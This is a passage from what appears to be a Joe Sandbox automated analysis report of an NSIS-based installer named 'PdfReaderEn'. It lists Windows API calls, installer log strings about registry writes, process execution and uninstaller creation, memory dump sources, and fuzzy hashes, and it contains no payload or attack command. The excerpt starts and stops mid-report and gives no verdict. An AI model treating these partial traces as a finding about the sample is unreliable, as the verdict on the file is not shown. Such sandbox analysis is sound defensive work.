                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                                                                                                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00406B4D
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                                                                                                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$ByteCharCloseGlobalHandleMulusermePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                          • String ID: F$%s=%s$NUL$[Rename]
                                                                                                                                                                                          • API String ID: 565278875-1653569448
                                                                                                                                                                                          • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                                                                                                                          • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                                                                                                                          • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                                                                                                                          • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                          • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                          • String ID: F
                                                                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                                                                          • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                                          • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                                                                                                                          • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                                          • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                                                                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                                                                                                                          • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                                                                                                                          • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                          • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                          • API String ID: 3581403547-784952888
                                                                                                                                                                                          • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                                                                                                          • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                                                                                                          • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                          • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                          • API String ID: 1641139501-220328614
                                                                                                                                                                                          • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                                                                          • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                          • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                          • API String ID: 3294113728-3145124454
                                                                                                                                                                                          • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                                                                          • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                                                                          • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                                                                                                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                                                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                                                                                                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                          • API String ID: 3734993849-2769509956
                                                                                                                                                                                          • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                                                          • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                                                                                                                          • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 00403E2B
                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00403E55
                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                          • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                                          • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                                                                                                                          • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                                                                                                                          • API String ID: 1033533793-945480824
                                                                                                                                                                                          • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                                          • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                                                                                                                          • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                            • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                            • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                          • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
